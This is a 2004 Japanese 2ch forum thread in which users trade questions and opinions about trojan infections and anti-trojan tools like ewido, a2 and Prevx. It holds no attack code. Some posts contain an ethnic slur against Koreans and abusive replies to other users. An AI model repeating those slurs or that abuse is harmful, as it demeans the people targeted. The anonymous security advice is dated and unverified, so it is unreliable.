411 ：名無しさん＠お腹いっぱい。 ：04/10/16 12:02:54: 助けてください
毎晩チョんが木馬に乗って攻めてきます
412 ：名無しさん＠お腹いっぱい。 ：04/10/16 13:59:42: >>411
漏れも・・・マカヒー入れても食らった。退治できたけど
413 ：名無しさん＠お腹いっぱい。 ：04/10/16 16:14:17: 211.175.39.189が、
KOREAから攻めてきました
414 ：名無しさん＠お腹いっぱい。 ：04/10/16 16:47:15: FW入れとけよ
415 ：名無しさん＠お腹いっぱい。 ：04/10/16 22:50:15: >>404
SwatIt Free はほとんど更新無し。(年に数回しかない)
暫らく使ってたけどやめた。
SwatIt の有償版を使ってる人っているのかな？
有償版の更新頻度が気になるが。
416 ：名無しさん＠お腹いっぱい。 ：04/10/16 22:58:28: ａ2 Ｖｅｒうｐまだなのかな…
417 ：名無しさん＠お腹いっぱい。 ：04/10/17 18:57:03: >>378
NetBusはそれ自身がサーバとして働いているタイプものだけど昨今のスパイウェアのように
遠隔地に置いてある指令所のホストにあくまでクライアントとして接続して命令を受け取り実行するといったタイプのほうが増えていると思う
418 ：名無しさん＠お腹いっぱい。 ：04/10/18 17:09:07: クライアントならFW突破するのも造作もないからね‥
419 ：名無しさん＠お腹いっぱい。 ：04/10/18 17:38:46: >>417
>クライアントならFW突破するのも造作もないからね‥
理解できない。FW突破する手口をきぼん。
420 ：名無しさん＠お腹いっぱい。 ：04/10/18 17:49:02: サーバー側が８０番ポートならＷｅｂアクセスと認識するからって意味じゃない？
421 ：名無しさん＠お腹いっぱい。 ：04/10/18 18:19:20: >>419
普通、FWはアプリとポートを組み合わせてルールを作るので、80ポートならなんでも
OKとはいかないよ。
422 ：名無しさん＠お腹いっぱい。 ：04/10/18 19:03:27: ＦＷと言ってもルーター上でのフィルタリングとかＮＡＴとかの意味じゃないの？
突破とは言わないけどｗ
423 ：名無しさん＠お腹いっぱい。 ：04/10/19 11:11:29: ewidoがver3.0のうｐだてしますか？とか聞いて来るんだが
エロい人解説キボンヌ…
424 ：名無しさん＠お腹いっぱい。 ：04/10/19 11:18:40: すごいうｐだてｷﾀｷﾀｷﾀｷﾀ━━━(ﾟ∀ﾟ≡(ﾟ∀ﾟ≡ﾟ∀ﾟ)≡ﾟ∀ﾟ)━━━━!!!!!!!
425 ：名無しさん＠お腹いっぱい。 ：04/10/19 11:53:46: 2回も再起動させんのかよ
なめてるから後回し
426 ：名無しさん＠お腹いっぱい。 ：04/10/19 16:43:00: インスコする時backgroundguard聞かれるけど後でも設定できるみたい
427 ：名無しさん＠お腹いっぱい。 ：04/10/19 17:29:41: 会社のデスクトップ機でv3にアップデート実行。皆さん仰せの通り、2回再起動
させられる。タスクバーのアイコンを右クリックすると、従来一番下にあった
"Launch main program"が一番上に行って、一番下に"shutdown guard"が
来たのがびっくりさん。

現在v3.0でスキャン中だが、これまで引っ掛からなかったトロイを1個引っ掛けた。
428 ：名無しさん＠お腹いっぱい。 ：04/10/19 21:08:12: Additinal Options

Select additional Options for the Installations.

Install background guard(recommended)
Install Shell-Extension
429 ：名無しさん＠お腹いっぱい。 ：04/10/19 23:58:43: 金払った覚えはないのに、ewidoが2週間以上常駐保護してる気がします。
起動のたびにewidoが常駐し、 realtime protection にチェックが入ってるんです。
また、status の license　information の package: が plus になってます。
これ有償版って事ですか？なぜ？

あと、新バージョンって、スキャン対象で +everything 押すたびに
ドライブが繰り返し登録されていきますね。
前は何回押しても一通りしか登録されなかったのに。
430 ：名無しさん＠お腹いっぱい。 ：04/10/20 00:27:02: >>429
ver.3.0になってからplusになってるね
「機能制限なし」だってヽ(´∀`)ﾉ

多分、次のうｐだてで修正されるだろうけど・・・
431 ：名無しさん＠お腹いっぱい。 ：04/10/20 14:54:22: 新しいPCにはewidoを入れてなかったが、>>429,430を見て今試しに入れてみたら
ちゃんとdemo版になっている。もう修正されたのだろうか？
ちなみに+everything 押すたびにドライブが繰り返し登録されていくのは修正されていない。
432 ：名無しさん＠お腹いっぱい。 ：04/10/20 15:07:30: 今日うｐだてしたよ
433 ：名無しさん＠お腹いっぱい。 ：04/10/20 17:56:59: Install Shell-Extension

これ選択すると.exeが常駐するね。
434 ：名無しさん＠お腹いっぱい。 ：04/10/20 18:54:06: >>433
ewudoctrl.exe
コイツは何者でつか？
435 ：434 ：04/10/20 19:00:31: 素でスペル間違った…

？？　Install background guard(recommended)
→ewidoguard.exe常駐

？？　Install Shell-Extension
→ewidoctrl.exe常駐
436 ：名無しさん＠お腹いっぱい。 ：04/10/20 19:06:05: >>435
Shell-Extensionを選択しなくてもewidoctrl.exeは常駐するみたい。
437 ：名無しさん＠お腹いっぱい。 ：04/10/20 19:45:06: もまいら、別スレ立てれば？
使い方とかのやりとりは勘弁してくれ。
438 ：名無しさん＠お腹いっぱい。 ：04/10/20 20:58:06: >>435
上のはアイコンが常駐する
下のは拡張機能じゃないの
439 ：名無しさん＠お腹いっぱい。 ：04/10/20 22:16:37: Shell-Extensionも知らないとは。
440 ：名無しさん＠お腹いっぱい。 ：04/10/21 00:16:56: >>437
ewido【Trojan Horsesが気になる貴方に】
http://pc5.2ch.net/test/read.cgi/sec/1098285373/
441 ：名無しさん＠お腹いっぱい。 ：04/10/21 16:28:31: nycrkldr15.exeを使って今まで普通にウイニー２してたんですがさっきトロイだと解り即ウイニーごと削除しました。

検索してたら>>27-30の会話だけが引っかかってここにたどりついたのですが

nycrkldr15.exeのトロイの木馬はどんな症状になるのか教えてください。
442 ：名無しさん＠お腹いっぱい。 ：04/10/21 19:29:06: >>441
>>27-29
443 ：名無しさん＠お腹いっぱい。 ：04/10/21 19:40:47: ﾜﾛﾀ
444 ：名無しさん＠お腹いっぱい。 ：04/10/21 19:47:18: >>441
ewido aﾖ bitdefender pandaで異常なし
445 ：名無しさん＠お腹いっぱい。 ：04/10/21 20:52:22: ewidoってマニュアルねーの？
446 ：４４１ ：04/10/21 22:11:47: Trojan Horseとしか書いてありませんが？
ewidoって何ですか？
447 ：名無しさん＠お腹いっぱい。 ：04/10/22 00:04:43: あんたこそ何ですか?
448 ：名無しさん＠お腹いっぱい。 ：04/10/22 15:32:11: ウィルスバスターコーポレートで【TROJ_Linage.E】というウィルスが発見されました。
トレンドマイクロはもちろん、他のサイトやgoogleで調べても
ほとんど情報がありません。ちなみに感染経路もわかりません。メールの送受信も
してませんし、サイトも見てない時にいきなり発見されました。Ｐ２Ｐも
立ち上げてなかったので関係ないと思います。かなり新しいウィルスかなぁ・・
それにしても名前がリネージュって・・（＾＾；）誰か知りませんか？
449 ：名無しさん＠お腹いっぱい。 ：04/10/22 15:40:22: >>448
メーカーに直接電話かメール
450 ：名無しさん＠お腹いっぱい。 ：04/10/23 23:14:52: 新潟の友人に電話してみたら
「PCのセキュリティは無問題だけど家のセキュリティはボロボロになった」
って返事が来た…
451 ：名無しさん＠お腹いっぱい。 ：04/10/23 23:19:01: 　　　　　　 ,,,,,,,,,,　　　　　　　　　　　　　　　　　　　　 ,,ii,,、　　　　 ,,,i,,、　　
　　　　　　.,lllllllll,,,,,,,,,,,,,,,,,,,,,,,　　　　　　　　　　　　　 ,iillllllllllii,,　　　　,,,iillllllllii,,,　　
　　iiiiiiiillllllllllllllllllllllllllllllllllllllll|　　　　　　　　　　　　　　　ﾞﾞ!lllllllllllllir　.,,,iilllllllllllllll!ﾞﾞ′
　 .llllllllllllllllllllllllll!!!!!!!!!!!!!!!!!″　　　　　　　　　　　　　　　　ﾞﾞ!!ll!ﾞ",,,iilllllllllllll!!ﾞﾞ゜　　　
　 .ﾞﾞﾞﾞﾞﾞ”゛ llllllllllliiiiiiii,,,,,,,、　　　　　　　　　　　　　　　　　　 ,,,iillllllllllll!!ﾞﾞ゜＿__,,,,,　
　　　 ,,,iiillllllllllllllllllllllllllllllliii,,　　　　　　　　　　　　 ,,,,,,,,,iiiiiiilllllllllllllllllllllllllllllllllllllllll　
　　.,,illlllllllllllllllllllﾞﾞﾞﾞﾞﾞ!!llllllllllllli,　　　 .,,,,,iiiiiiiiiiiiiiiiiii,,,、　 .llllllllllllllllllllllllllllllllllllllllllllllll!!!!!!l　
　 ,illllllllll!ﾞﾞllllllllll|　　,illlllllllllllllll,　 liilllllllllllllllllllllllllllllllli,,　 lllllllllll!!lllllllllllllll!!ﾞﾞﾞ”｀　　　　　
　,llllllllllﾞ　.lllllllllll　.,,illlllllllllllllllllll、ﾞllllll!!ﾞﾞﾞ’　　ﾟﾞllllllllll　ﾞﾞ”｀.,illllllllll!lﾞ’　　　　　　　　　
: llllllllll° .llllllllllll,illllllllll!ﾞ｀lllllllllll　 .ﾞﾞ゜　　　　　 ,llllllllll!　　　,llllllllllll°　　　　　　　　　
: llllllllll,　　lllllllllllllllllll!ﾞ゜　,lllllllllll　　　　　 ,,,illllllllll!゜　　 .llllllllllllli,_　　　 ,,,,,,,,iiiiiii、　
: 'lllllllllllliiilllllllllllllll!!ﾞ’　　,lllllllllll°　　　 .,,,,iiillllllllllll!ﾞ゜　　　ﾞ!llllllllllllllllliillllllllllllllllllllllll,、　
　.ﾞ!!lllllllllllllllll!!!ﾞﾞ｀　　　.l!!llllllll°　　　　.ﾞ!lllllll!!!ﾞ°　　　　　ﾞﾞ!!llllllllllllllllllllllllllllll 　
452 ：名無しさん＠お腹いっぱい。 ：04/10/24 14:29:04: ewidoうｐだて
453 ：名無しさん＠お腹いっぱい。 ：04/10/24 15:20:56: nycrkldr15ってウイニーのクラックは何するもの？
454 ：名無しさん＠お腹いっぱい。 ：04/10/24 17:12:08: >>452
向こうに書き込め。

>>453
お前は出入禁止。
455 ：名無しさん＠お腹いっぱい。 ：04/10/25 00:06:40: ewidoスレ終わってるじゃんｗ
456 ：名無しさん＠お腹いっぱい。 ：04/10/25 05:00:18: ewidoうｐだてｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!
457 ：名無しさん＠お腹いっぱい。 ：04/10/27 07:38:03: ewidoって2週間以上も使えるけど、
うｐデートとかサポートがそれ以上適用されなくなるんだろ？

漏れ知らないで使ってたから
なんか2週間後に急にごちゃごちゃいじられるのはじまったから
少し焦ったけどな。スレ違いｽﾏｿ。
458 ：名無しさん＠お腹いっぱい。 ：04/10/27 08:11:06: >>457
>うｐデートとかサポートがそれ以上適用されなくなるんだろ？

ということは定義ファイルうｐデートしてもスキャンの時に
古い定義ファイルを使われるってこと？
459 ：名無しさん＠お腹いっぱい。 ：04/10/27 09:38:16: 質問です。
エロサイトを巡回中ノートン先生が
Trojan　horseを見つけたその後
修復出来ませんでしたのメッセージ
ewidoでまずメモリースキャンしたが検出されず
Trojanが入っている場所
Documentos　and　Settings/ユーザー名/ApplicationDataを
スキャンしても検出されず
A2で同様のフォルダーをスキャンするも
検出されなかった。
これはTrojanには感染してなかったって事でしょうか？
あと、ewido（無償版）をウＰデートしたら、
Databaseが無くなりましたっぽいメッセージがでるのですが
これは使えなくなったってことでしょうか？
長文すみません。
460 ：名無しさん＠お腹いっぱい。 ：04/10/27 12:37:24: >>459
オンラインスキャンすべし
それとトロイがあると思われるフォルダを調べる

>>Databaseが無くなりましたっぽいメッセージがでるのですがこれは使えなくなったってことでしょうか？
使えなくなったっぽい・・・としか言えない
461 ：名無しさん＠お腹いっぱい。 ：04/10/29 02:48:50: ewidoをupdateしたら日本語になった。
462 ：名無しさん＠お腹いっぱい。 ：04/10/29 17:19:38: なんか
r'⌒X⌒X⌒X⌒X⌒X⌒X⌒X⌒X⌒X⌒X⌒X⌒X⌒X⌒X⌒ヽ ⊂ﾞ⌒ﾞ､∩
ヽ__乂__乂__乂__乂__乂__乂__乂__乂__乂__乂__乂__乂__乂__乂__ノ　⊂（｡A｡）ｷﾀ━━━━━━━━!!!!!!
463 ：帆船8●1 ：04/10/29 18:29:24: >>461

　　ﾉﾉﾉﾉ
　　(*ﾟ∋ﾟ)　！！
￣￣|￣￣|￣|⌒ヽ
￣|￣￣|￣￣|ﾟωﾟ) ！！　
￣￣|￣￣|￣|⌒丶
￣|￣￣|￣￣|从ｗﾉ　　
￣￣|￣￣|￣|Д゜ﾉ　！！
￣|￣￣|￣￣|　/
￣￣|￣￣|￣|∀・）！！
＾^＾^＾^＾^＾^＾^＾^＾^＾^＾
464 ：名無しさん＠お腹いっぱい。 ：04/10/29 20:41:45: ホントだ、いきなり無言で日本語化されたのでビックリしたぞ（笑）
465 ：名無しさん＠お腹いっぱい。 ：04/10/29 20:52:34: ewido常駐、こんなにCPU食ったっけ？
466 ：名無しさん＠お腹いっぱい。 ：04/10/29 22:12:24: 日本語化ワロタ
驚いた
467 ：名無しさん＠お腹いっぱい。 ：04/10/29 22:24:21: ewido苺キンタマには即対応するしネラーいるんじゃないの？ｗ
468 ：名無しさん＠お腹いっぱい。 ：04/10/29 22:26:11: うるせーデブ
469 ：名無しさん＠お腹いっぱい。 ：04/11/01 13:58:55: 日本語化で笑っていたら今度はアップデートできなくなった
なんだこりゃ
470 ：名無しさん＠お腹いっぱい。 ：04/11/01 16:18:10: 最近、ノートン先生がやたらとトロイの木馬の侵入を検知して
遮断するのだが、はやってるのでしょうか・・
あと少し前に流行した４４５が多いみたいです。
471 ：名無しさん＠お腹いっぱい。 ：04/11/01 16:31:52: >>470
ttp://www.cyberpolice.go.jp/detect/observation.html

いつものこと
Blockしてるんなら気にしないでいいんでないの
472 ：名無しさん＠お腹いっぱい。 ：04/11/01 17:18:48: >>471
そうっすか・・こんなサイトがあったのですね。ありがとう。
参考までに最近トロイの木馬攻撃をしてきた出元は
アメリカのセントルイスとサンノゼの２都市でした。
473 ：名無しさん＠お腹いっぱい。 ：04/11/01 18:50:58: NAVのログに「Trojan horse」と脅威名が出てるんですが
これはトロイの木馬の総称って事ですか？
修復できていないようで怖いです
474 ：名無しさん＠お腹いっぱい。 ：04/11/01 22:11:54: ewido【Trojan Horsesが気になる貴方に】
http://pc5.2ch.net/test/read.cgi/sec/1098285373/
475 ：名無しさん＠お腹いっぱい。 ：04/11/01 22:39:30: a2 update

Downloading Common signature update 10/31/2004 ...
12 new signatures added - and by the way: Happy Halloween! :)
476 ：名無しさん＠お腹いっぱい。 ：04/11/01 23:51:31: びっくりしたぁ～突然、ewidoが日本語になった。
477 ：名無しさん＠お腹いっぱい。 ：04/11/02 00:15:23: seeq何とかという広告がでてくるけどトロイ？
ググッたけどでてこなかった。
478 ：名無しさん＠お腹いっぱい。 ：04/11/03 04:21:18: トロイに感染した後あるテキストファイルがなくなりました、
検索してもひっかからないし削除した憶えもありません、
ハッキングされ盗まれたのでしょうか？
479 ：名無しさん＠お腹いっぱい。 ：04/11/03 10:55:52: それだけの情報で、本気で他人に判断を仰ぐというのか
480 ：478 ：04/11/03 11:39:28: なぜかごみ箱の中に「俺厳選!!ｴﾛ画像総特集.TXT」が見つかりました
これからはきちんとバックアップを取りたいと思います
481 ：いなむらきよし ：04/11/03 16:00:49: 奇形もバックアップ（＾＾）
482 ：名無しさん＠お腹いっぱい。 ：04/11/03 18:59:52: ニュース実況＋で踏んでしまった...＿|￣|○
483 ：名無しさん＠お腹いっぱい。 ：04/11/03 21:22:32: a2 update
484 ：名無しさん＠お腹いっぱい。 ：04/11/05 16:31:47: うわっ
a2も今日ﾋｻﾋﾞｻに立ち上げてみたら
容姿が変わってたから
ビビッた
485 ：名無しさん＠お腹いっぱい。 ：04/11/09 05:50:01: >>3にあるオンラインチェックのttp://onlinecheck.emsisoft.com/en/はやらないほうがいいぞ
一回チェックしてみたら最後、全然そのページも開いてない時でさえ
延々となんか送ってきてる。先生が遮断しているけどうざくてしょうがない。悪質サイトだな。
486 ：名無しさん＠お腹いっぱい。 ：04/11/09 14:42:39: NOD32を使えば全て解決しますよ♪
素晴らしいｿﾌﾄです。
487 ：名無しさん＠お腹いっぱい。 ：04/11/09 17:53:29: 常駐保護するなら、これはなかなか優れものと思うが。
オレは常駐保護の期限の切れたewidoと組み合わせて使ってる。

Prevx Home - Version: 2.0 free security product
http://www1.prevx.com/prevxhome.asp
488 ：名無しさん＠お腹いっぱい。 ：04/11/09 18:08:16: >>487
面白そう。
489 ：名無しさん＠お腹いっぱい。 ：04/11/09 21:15:26: >>487
これってFireWallなの？
490 ：名無しさん＠お腹いっぱい。 ：04/11/09 21:32:12: Firewall、Anti-virus との比較表を見れば違うのがハッキリ分かると思うがねぇ。
アンチハッカー、アンチトロイ、アンチスパイの常駐して監視、保護してくれる
総合セキュリティツール。
491 ：名無しさん＠お腹いっぱい。 ：04/11/09 21:36:01: >>487
常駐時メモリどの位食う？
492 ：名無しさん＠お腹いっぱい。 ：04/11/09 21:56:31: http://ratan.dyndns.info/virus/PrevxHome/
ここを読む限りでは、とにかく新しくソフトをインストールするような動きを
監視するソフトっぽいですな。
493 ：名無しさん＠お腹いっぱい。 ：04/11/09 22:02:43: 元バスターユーザーを装ってノートンスレを荒らしにきた雑音が、
自演をミスる醜態を晒してたよ。
115と名乗るべきところを118と書いてしまったという（ｗ

http://pc5.2ch.net/test/read.cgi/sec/1099893189/115-119
115 名前：名無しさん＠お腹いっぱい。　　投稿日：04/11/09 17:07:19
本日から、バスターからノートン2005に乗り換えたんですが、スキャンで
ウィルスが検出されましたが、自動で修復してくれました。その時のウィルス
の詳細が知りたいのですが、ウィルスのログが探してもどこにあるかわかりません。
すみませんが、教えてください。お願いいたします。
------------------------------------------------------------------------------
118 名前：名無しさん＠お腹いっぱい。　　投稿日：04/11/09 17:09:20
>>115
レポート→検疫項目を表示
------------------------------------------------------------------------------
119 名前：118　　投稿日：04/11/09 17:13:04
すみません。ありがとうございます。
バスターより複雑なので、迷ってしまいました。
『VBS.LoveLetter.Var』というのが検出されてましたが、シマンテックの
HPのウィルス辞書には、ないのですがどうしてなんですか？
重ね重ねお願いいたします。
494 ：名無しさん＠お腹いっぱい。 ：04/11/10 19:26:18: Abtrusion Protector と似てるの？
495 ：名無しさん＠お腹いっぱい。 ：04/11/11 01:18:59: TrojanSpy.Win32.Agent.lというトロイに感染しますた。
Spybot,AVG,BitDefender,ﾌﾟﾘｲﾝｽｺされてたマカフィーと試しましたが駆除できず。
駆除できるよってな情報お持ちの方おられましたら教えてください。。
496 ：名無しさん＠お腹いっぱい。 ：04/11/11 04:38:07: >>495
http://pc5.2ch.net/test/read.cgi/sec/1092988445/740
497 ：名無しさん＠お腹いっぱい。 ：04/11/11 04:48:57: ewidoのサイトのデータベースで検索したところ
TrojanSpy.Win32.Agent.lは引っかからなかったです。。
498 ：名無しさん＠お腹いっぱい。 ：04/11/11 05:36:16: >>497
で？
499 ：名無しさん＠お腹いっぱい。 ：04/11/11 05:43:15: ttp://www.a-2.org/en/malware/?TrojanSpy.Win32.Agent.l
リカバリだな。
500 ：名無しさん＠お腹いっぱい。 ：04/11/12 02:53:43: cornelius 18 from Nakameguro to Everywhere
http://ex5.2ch.net/test/read.cgi/musicj/1097624180/706

>>706が、IP抜いたと騒いだり、トロイをしかけたなどと宣言しているけれど、
ほんとのことなの？ほんとだったら犯罪じゃない？
501 ：名無しさん＠お腹いっぱい。 ：04/11/12 05:26:24: リカバリだな。
502 ：名無しさん＠お腹いっぱい。 ：04/11/12 08:01:05: いやロカビリだろ
503 ：名無しさん＠お腹いっぱい。 ：04/11/12 08:02:15: リハビリだよ
504 ：名無しさん＠お腹いっぱい。 ：04/11/12 10:31:57: ローゼンカバリだよ
505 ：名無しさん＠お腹いっぱい。 ：04/11/12 11:18:37: カバディっしょ
506 ：名無しさん＠お腹いっぱい。 ：04/11/12 18:59:04: 質問でつ

Zipファイルの中にあるexeファイルにトローイのやろいを発見したのれすが、
解凍してexeを実行しない限り感染しないのれすか？
つまり実行しなければウイルスと同じように、解凍したり解凍ソフトで
zipの中身を参照しても感染しないということでつか？
507 ：名無しさん＠お腹いっぱい。 ：04/11/12 19:05:18: 【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果（ウイルス名・発見場所）】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】
508 ：名無しさん＠お腹いっぱい。 ：04/11/12 21:31:20: 最近WINDOWSを立ち上げると、mIRC32という名前のＤＯＳウインドウが現れるようになった。
ちょっと調べたところ、トロイ系のウイルスみたいだったのでＡＶＡＳＴとシマンテックでスキャン
したんだけど、効果無しでした。
誰か対処方法を教えてくれ～！！！
509 ：名無しさん＠お腹いっぱい。 ：04/11/12 22:04:06: テンプレ
510 ：名無しさん＠お腹いっぱい。 ：04/11/13 23:10:02: >>508
一回死ね
511 ：名無しさん＠お腹いっぱい。 ：04/11/14 02:25:05: 　　　　　？　　　　　？
　　　　？？　　　　　？？
　　　　？？？？　　　？？？？
　　？？？？？？？？？？？？？？
　？？？？？？？？？？？？？？？？？
　？？？？？？？？？？？？？？？？？
　？？？？？？？？？？？？？？？？？
　？？？？？？？？？？？？？？？？？
　　？？？？？？？？？？？？？？？
　　　？？？？？？？？？？？？
　　？？？？？？？？？？？？？？？
　？？？？？？？？？？？？？？？？？
512 ：名無しさん＠お腹いっぱい。 ：04/11/14 18:45:53: すいません、初心者です。
ウイルスにかかって、ウイルスバスターズで検索したところ
１５個ファイルが見つかりました。
（ウイルスにかかってから、バスターズをダウンロードしました）
削除も隔離もできませんでした。
ＴＲＯＪ＿ＤＹＦＵＣＡ．Ｍ
ＴＲＯＪ＿ＤＹＦＵＣＡ.ＣＲがみつかりました。
Meを使ってます。
調べたところ、
手動削除手順：
最新のバージョン（エンジン、パターンファイル）を導入したウイルス対策製品を用い、
ウイルス検索を行ってください。
この不正プログラムは「TROJ_DYFUCA.M」として検出されます。
検出されたファイルはすべて「削除」してください。

と書かれてありました。
手動で削除しなさい、とも書いてあったのですが何度読んでも
理解できません。
パソコンのどこから開いて何を削除したらよいのでしょうか？
過去ログを読んでも難しくて実は理解できてないです。
どなたか親切な方、お願いします。教えて下さい。
513 ：名無しさん＠お腹いっぱい。 ：04/11/15 00:16:10: お尋ねします。
Trojan horse BackDoor.Agent.2.H に感染しました。
ＯＳはwindowsXP。サービスパック①のときの感染です。現在は、サービスパック②です。
ＡＶＧで判明です。困っています。よろしくです。
514 ：名無しさん＠お腹いっぱい。 ：04/11/15 03:16:52: >>513
>>3のオンラインチェックしてみ。

パクリテンプレ
【1-20を読んだか】
【使用OS】
【WindowsUpdateしてるか】
【AntiVirus/AntiTroyは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果（ウイルス/トロイ名・発見場所）】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】
515 ：名無しさん＠お腹いっぱい。 ：04/11/15 08:15:52: ewidoでTrojanDownloader.VB.dbが見つかりました。
ログ↓

C:\WINDOWS\Downloaded Program Files\PPSDKActiveXScanner.INF ->
　　 TrojanDownloader.VB.db -> バックアップ後削除

トレンドマイクロやシマンテックやa2やewidoのデータベース見ても、
どういうトロイかわかりません。これなにするやつですか？
削除したらそれで問題ありませんか？
XPhomeSP2です。
516 ：名無しさん＠お腹いっぱい。 ：04/11/15 19:53:03: >>515
ewido【Trojan Horsesが気になる貴方に】
http://pc5.2ch.net/test/read.cgi/sec/1098285373/
517 ：名無しさん＠お腹いっぱい。 ：04/11/15 21:21:49: 削除できたのに
コマンドプロンプトで　netstat -a
したら　ＥＳＴＡＢＬＩＳＨＥＤ　が出ています
まずいですか？
518 ：名無しさん＠お腹いっぱい。 ：04/11/16 00:44:55: で、君たちはいったいどこでそんなの拾ってくるんだい?
まっかく、こっちがききたいわ
519 ：名無しさん＠お腹いっぱい。 ：04/11/17 21:44:23: で、>>487はどうなのよ？
520 ：名無しさん＠お腹いっぱい。 ：04/11/18 19:09:54: >>519 お手軽ツールなのかと思ってたけど
激しく強力なツールな気がする。
常駐機能のみ。拒否、確認、お知らせのみ？の
３段階で各項目を事前に設定する必要が有る。
デフォのままで良いと思うけど。

感覚的にはSSMの細かい設定が出来ない版って
感じがした。動作は軽くてUIは黒が基調でカコイイ。
521 ：名無しさん＠お腹いっぱい。 ：04/11/18 20:51:30: お、インスコした人いるのか。
copycat試してﾎｽｲ。
522 ：名無しさん＠お腹いっぱい。 ：04/11/18 21:36:07: Prevx試してみようと思たがXP、2000じゃないとだめなのか…
Meは(・∀・)ｶｴﾚ!!ってことで挫折orz
523 ：名無しさん＠お腹いっぱい。 ：04/11/18 23:41:32: XPだけどPrevx Home 2.0インスコできねぇ。。
なんかインストールの途中でエラーがでて終わっちまう orz
524 ：523 ：04/11/18 23:48:44: その時のエラーメッセージ。

Error 1720. There is a probles with this Windows Installer
package. A script required for this install to complete could not be
run. Contact your support personnel or package vender.
525 ：名無しさん＠お腹いっぱい。 ：04/11/19 00:54:49: 勝手にサービス切って騒いでるだけだろ
526 ：名無しさん＠お腹いっぱい。 ：04/11/19 03:11:11: あーっ！もう！韓国からのトロイ攻撃多すぎる。
誰か何とかしてくれ。
527 ：名無しさん＠お腹いっぱい。 ：04/11/19 06:55:47: 全く無知で英語も理解できず、翻訳などと努力する事もしない、
そんな漏れもPrevx Home 2.0入れてみた
v2.0は>>492さん紹介のサイトのような登録は必要無いが、
ほんとにデフォルトでいいのか不安だ･･･
なにせやる事が無いからw
確かに軽くていいね
updateの間隔も設定できるからほんと、やる事無くなるのよね

日本語化出来ますように･･･他力本願
copycatは何方かﾖﾛ
528 ：名無しさん＠お腹いっぱい。 ：04/11/19 07:35:03: prevxはアウトバウンドも面倒見てくれるのか？
529 ：名無しさん＠お腹いっぱい。 ：04/11/19 11:49:56: >>528 セキュリティーセッティングって所が
設定する場所なんだけど簡易SSMみたいな感じで
FW機能は無いみたい。
530 ：名無しさん＠お腹いっぱい。 ：04/11/19 22:00:32: >>529
ということは、アプリケーションを起動しようとすると、
起動していいかどうかダイアログが出るの？
531 ：名無しさん＠お腹いっぱい。 ：04/11/20 00:04:34: 出ない

各種セキュリティのうｐに一々鬼のようにポップアップしやがる
アラートが出てる間は当然うｐｲﾝｽｺは中断してる訳だが。
一度のallow/denyでうｐだて完了まで大人しくさせるにはどうやるんだ？
「this event～」だとﾑﾘで、
その下のでもすぐにポップしてくるし
ewidoのver.UPの時のようにシグネーチャー総どっかえみたいな時が心配だw

ヘルプ読むか　土曜だし
532 ：531 ：04/11/20 00:29:16: 自己解決
ちなみに
常駐アイコン右クリ「Trusted Installation」のようだ
試そうにもうｐだて出来るのが無い
何かｲﾝｽｺするのもめんどい
533 ：名無しさん＠お腹いっぱい。 ：04/11/20 06:35:25: ewidoの古いシグネーチャー総どっかえ、早速来たが反応せんかった
534 ：名無しさん＠お腹いっぱい。 ：04/11/20 18:13:39: ってことはcopycatはブロックできなさそうだな。
code注入後にアラートみたいな。
535 ：名無しさん＠お腹いっぱい。 ：04/11/20 19:13:44: が、ノートン定義ファイルにはシツコク反応するんだよなぁ
ewidoのシグネチャとノートンの定義ファイルとどう違うのかワシには分からんw
536 ：名無しさん＠お腹いっぱい。 ：04/11/20 19:42:27: アンチウイルスソフトを入れているのに、なおかつ
アンチトロイソフトを入れるメリットってあるの？
あと、アンチウイルスソフトは複数入れちゃいけないのが常識。
アンチウイルスソフトとアンチトロイソフトはバッティングしないの？
537 ：名無しさん＠お腹いっぱい。 ：04/11/21 02:17:31: アンチウイルスはトロイには弱いのでアンチトロイも入れるべし
アンチウイルスを常駐させてアンチトロイは非常駐でつかえば
バッティングしない（右クリ用で使うとか）
538 ：名無しさん＠お腹いっぱい。 ：04/11/21 03:10:46: 常駐についてこんな意見も
＞おまいら勘違いしすぎ。
＞a2にでもこれにしても、金払って常駐監視させて使うのが本道のツールなんだよ。
＞トロイはマシンに進入されたらもうアウトだと思うぐらいじゃないとな。
＞トロイはそんなに甘いもんじゃない。
＞フリーが役に立つのは子供でも気付くアーカイブの中に入っている悪戯appを見つけることぐらいだよ。
ewido【Trojan Horsesが気になる貴方に】
http://pc5.2ch.net/test/read.cgi/sec/1098285373/103
539 ：名無しさん＠お腹いっぱい。 ：04/11/21 03:27:12: Kasperskyという、アンチウィルス/トロイを兼ねてしかも
どちらの検出率も飛び抜けている実績を持つ
優秀な常駐プログラムがあります。
540 ：名無しさん＠お腹いっぱい。 ：04/11/21 09:40:49: >>538
そのスレでも誰にも相手されてないじゃん
541 ：名無しさん＠お腹いっぱい。 ：04/11/21 09:56:27: とりあえずSSMで起動を阻止するのも手では？
542 ：名無しさん＠お腹いっぱい。 ：04/11/21 11:55:08: >>537
アンチウイルスがトロイに弱いというのはなぜ？
検出の仕組みが違うの？
つまりウイルスの検出力を上げるとどうしても
トロイの検出力が下がるってこと？
543 ：名無しさん＠お腹いっぱい。 ：04/11/21 14:58:43: トロイって何でこうも削除できないんだろう？
申し訳ないのですが、削除の仕方教えてください

【使用OS】WindowsＭｅ

C:\windows\questmod.dll
C:\windows\vsapi32.dll
C:\windows\Schedlog
C:\windows\WIN386.SWP
上記４ファイルが「削除できません：アクセスできません。送り側のファイルが使用中の可能性があります」
と、なってしまい削除できません
どうしたらきれいに消せますか？
544 ：名無しさん＠お腹いっぱい。 ：04/11/21 15:36:54: 自己責任で。
http://www.forest.impress.co.jp/article/2002/11/06/rebootfiledeleter.html
545 ：名無しさん＠お腹いっぱい。 ：04/11/21 22:50:27: 最近ノートンを掲示板に投稿するため無効にしたままネットをしていると電源がブチっと切れました。急に切れることが何度も続くので数日ケーブルを外し放置したら直ったのでノートンでスキャンしたのですが何も感染は見つかりませんでした。
以前トロイの木馬が云々という警告がノートンから一度出たのでトロイとやらに感染したと思ってそうしました。

で特に今は何も問題ないんですがそれまではごくたまにだったトロイの警告がネットをしてるといつも出ます。いずれも韓国からです。

この状況はやばいのでしょうか・・・・どうか教えてください。
